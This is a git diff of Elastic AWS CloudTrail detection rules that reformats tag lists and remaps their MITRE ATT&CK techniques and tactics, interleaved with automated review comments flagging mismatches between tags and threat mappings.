-tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: Amazon S3",
+ "Use Case: Asset Visibility",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -132,21 +140,44 @@ info where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1070"
+name = "Indicator Removal"
+reference = "https://attack.mitre.org/techniques/T1070/"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
+
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1485.001"
 name = "Lifecycle-Triggered Deletion"
 reference = "https://attack.mitre.org/techniques/T1485/001/"
+
+
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
index 1ae94df10c8..d441f9f41fd 100644
--- a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
+++ b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/08"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,16 @@ references = [
 risk_score = 47
 rule_id = "bab88bb8-cdd9-11ef-bd9a-f661ea17fbcd"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SQS", "Use Case: Threat Detection", "Use Case: Log Auditing", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS SQS",
+ "Use Case: Threat Detection",
+ "Use Case: Log Auditing",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -90,16 +99,22 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
+
+
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
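Review bot: In the `@@ -90,16 +99,22 @@` hunk purging an SQS queue is re-m mapped from `T1485` "Data Destruction" (Impact) to `T1562.008` "Disable or Modify Cloud Logs" (Defense Evasion), and the tags hunk above follows the same change. An SQS queue is not a log source, so the new sub-technique's own name does not describe the action, whereas the removed technique did. If the rule is meant to catch an attacker emptying a queue that feeds a logging or alerting pipeline, say so in the description and consider keeping the `T1485`/TA0040 entry alongside the new one rather than replacing it.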
diff --git a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
index 4ae04aa84e1..ff639694edb 100644
--- a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
+++ b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/19"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -23,7 +23,16 @@ references = [
 risk_score = 47
 rule_id = "7a5cc9a8-5ea3-11ef-beec-f661ea17fbce"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Amazon Web Services", "Data Source: AWS", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS",
+ "Data Source: AWS STS",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -81,21 +90,37 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.001"
 name = "Additional Cloud Credentials"
 reference = "https://attack.mitre.org/techniques/T1098/001/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["aws.cloudtrail.user_identity.arn"]
diff --git a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml
index 1865f4c799b..07be3b05e01 100644
--- a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml
+++ b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/14"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/16"
 [rule]
 author = ["Elastic"]
@@ -116,16 +116,34 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1580"
 name = "Cloud Infrastructure Discovery"
 reference = "https://attack.mitre.org/techniques/T1580/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.005"
+name = "Cloud Instance Metadata API"
+reference = "https://attack.mitre.org/techniques/T1552/005/"
+
+
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["cloud.account.id", "user.name", "aws.cloudtrail.flattened.request_parameters.instanceId"]
diff --git a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml
index 357105f5229..197e4fc57fc 100644
--- a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml
+++ b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/16"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
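Review bot: A second `[[rule.threat]]` entry for Credential Access (TA0006 with `T1552.005`) is added to `discovery_ec2_userdata_request_for_ec2_instance.toml`, but no `tags` hunk for this file is visible in this chunk, so `"Tactic: Credential Access"` may be missing from the rule's tag list. Check that the tags were updated alongside the threat mapping, since the tactic tags and `rule.threat` are expected to agree.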
@@ -91,7 +91,16 @@ references = [
 risk_score = 47
 rule_id = "ea248a02-bc47-4043-8e94-2885b19b2636"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS IAM",
+ "Use Case: Identity and Access Audit",
+ "Resources: Investigation Guide",
+ "Tactic: Discovery",
+ "Tactic: Credential Access",
+]
 timestamp_override = "event.ingested"
 type = "threshold"
@@ -106,21 +115,34 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1087.004"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1087/004/"
+
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1110"
+name = "Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
+
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.threshold]
 field = ["cloud.account.id", "user.name", "source.ip"]
 value = 25
diff --git a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml
index 1653177f8bc..1998dca1376 100644
--- a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml
+++ b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/11"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/18"
 [rule]
 author = ["Elastic"]
@@ -124,11 +124,10 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1518"
-name = "Software Discovery"
-reference = "https://attack.mitre.org/techniques/T1518/"
+id = "T1538"
+name = "Cloud Service Dashboard"
+reference = "https://attack.mitre.org/techniques/T1538/"
 [[rule.threat.technique]]
 id = "T1580"
@@ -139,6 +138,7 @@ reference = "https://attack.mitre.org/techniques/T1580/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["cloud.account.id", "user.name"]
diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
index 01217202d6c..f410c0aad7a 100644
--- a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
+++ b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/30"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -85,7 +85,15 @@ references = [
 risk_score = 21
 rule_id = "7d091a76-0737-11ef-8469-f661ea17fbcc"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS Lambda",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -99,34 +107,17 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1578"
-name = "Modify Cloud Compute Infrastructure"
-reference = "https://attack.mitre.org/techniques/T1578/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1578.005"
-name = "Modify Cloud Compute Configurations"
-reference = "https://attack.mitre.org/techniques/T1578/005/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1648"
 name = "Serverless Execution"
 reference = "https://attack.mitre.org/techniques/T1648/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml
index 17dfd9e37dd..7164fa9a520 100644
--- a/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml
+++ b/rules/integrations/aws/execution_new_terms_cloudformation_createstack.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/25"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -98,14 +98,14 @@ field_names = [
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1651"
-name = "Cloud Administration Command"
-reference = "https://attack.mitre.org/techniques/T1651/"
-
+id = "T1648"
+name = "Serverless Execution"
+reference = "https://attack.mitre.org/techniques/T1648/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["cloud.account.id", "user.name"]
diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
index 4746bdbd03c..d54fc7697a2 100644
--- a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
+++ b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/13"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/08"
 [rule]
 author = ["Elastic"]
@@ -60,7 +60,15 @@ risk_score = 21
 rule_id = "96b2a03e-003b-11f0-8541-f661ea17fbcd"
 setup = "DynamoDB data events must be enabled in CloudTrail to capture the Scan action. Ensure that the AWS CloudTrail service is configured to log data events for DynamoDB tables."
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS DynamoDB", "Resources: Investigation Guide", "Use Case: Threat Detection"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS DynamoDB",
+ "Resources: Investigation Guide",
+ "Use Case: Threat Detection",
+ "Tactic: Exfiltration",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -74,16 +82,29 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1567"
+name = "Exfiltration Over Web Service"
+reference = "https://attack.mitre.org/techniques/T1567/"
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1530"
 name = "Data from Cloud Storage"
 reference = "https://attack.mitre.org/techniques/T1530/"
+
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_ec2_export_task.toml b/rules/integrations/aws/exfiltration_ec2_export_task.toml
index d6187d0130b..0934b06a3a4 100644
--- a/rules/integrations/aws/exfiltration_ec2_export_task.toml
+++ b/rules/integrations/aws/exfiltration_ec2_export_task.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/23"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -77,7 +77,16 @@ references = [
 risk_score = 47
 rule_id = "deee5856-25ba-438d-ae53-09d66f41b127"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: AWS",
+ "Data Source: Amazon Web Services",
+ "Data Source: AWS EC2",
+ "Use Case: Asset Visibility",
+ "Tactic: Exfiltration",
+ "Tactic: Collection",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -91,21 +100,39 @@ event.dataset: "aws.cloudtrail" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
+id = "T1537"
+name = "Transfer Data to Cloud Account"
+reference = "https://attack.mitre.org/techniques/T1537/"
-[[rule.threat.technique.subtechnique]]
-id = "T1567.002"
-name = "Exfiltration to Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1567/002/"
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[[rule.threat.technique]]
+id = "T1119"
+name = "Automated Collection"
+reference = "https://attack.mitre.org/techniques/T1119/"
+
+[[rule.threat.technique]]
+id = "T1530"
+name = "Data from Cloud Storage"
+reference = "https://attack.mitre.org/techniques/T1530/"
+
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
index c0fa1715988..a0aa65612d3 100644
--- a/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
+++ b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/21"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -99,7 +99,16 @@ references = [ risk_score = 47 rule_id = "c1812764-0788-470f-8e74-eb4a14d47573" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -113,16 +122,46 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml index 42239c6cd28..a0ba6578562 100644 --- a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml 
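Review bot: The new tag list drops `"Tactic: Discovery"`, but the threat hunk that follows in the same file keeps the `[rule.threat.tactic]` entry `id = "TA0007"` / `name = "Discovery"` alongside the new Exfiltration and Collection entries. Every threat tactic is expected to be mirrored by a `Tactic:` tag, so either add `"Tactic: Discovery",` next to the other two tactic tags or drop the Discovery threat entry if it is no longer wanted. The other rules in this diff keep tags and threat tactics in sync, so this looks like an oversight rather than a decision.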
+++ b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/06" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -151,38 +151,28 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique.subtechnique]] id = "T1213.006" name = "Databases" reference = "https://attack.mitre.org/techniques/T1213/006/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml index 508c391abc5..999b1b4a28f 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml 
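Review bot: The new Exfiltration entry (`[[rule.threat]]` … `[rule.threat.tactic]` with `id = "TA0010"`) carries no `[[rule.threat.technique]]` at all once T1567 / T1567.002 are removed, so the rule now asserts the tactic with no technique behind it. The sibling rules in this diff that dropped T1567.002 replaced it with `id = "T1537"` / `name = "Transfer Data to Cloud Account"`; if that was the intent here as well, the technique table is missing. This file's `tags` are not touched by the diff, so it is also worth confirming they already carry `Tactic: Exfiltration` and `Tactic: Collection` to match the two tactic entries.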
@@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -116,7 +116,16 @@ references = [ risk_score = 47 rule_id = "e8c9ff14-fd1e-11ee-a0df-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -139,16 +148,29 @@ and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipie [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml index 326b18d51b8..6d7ba2052c1 100644 
--- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -115,7 +115,16 @@ references = [ risk_score = 47 rule_id = "618bb351-00f0-467b-8956-8cace8b81f07" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -131,16 +140,29 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml index f744c959733..465364b2801 100644 --- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml +++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -64,7 +64,17 @@ references = [ risk_score = 21 rule_id = "3df49ff6-985d-11ef-88a1-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS SNS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Collection", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "new_terms" 
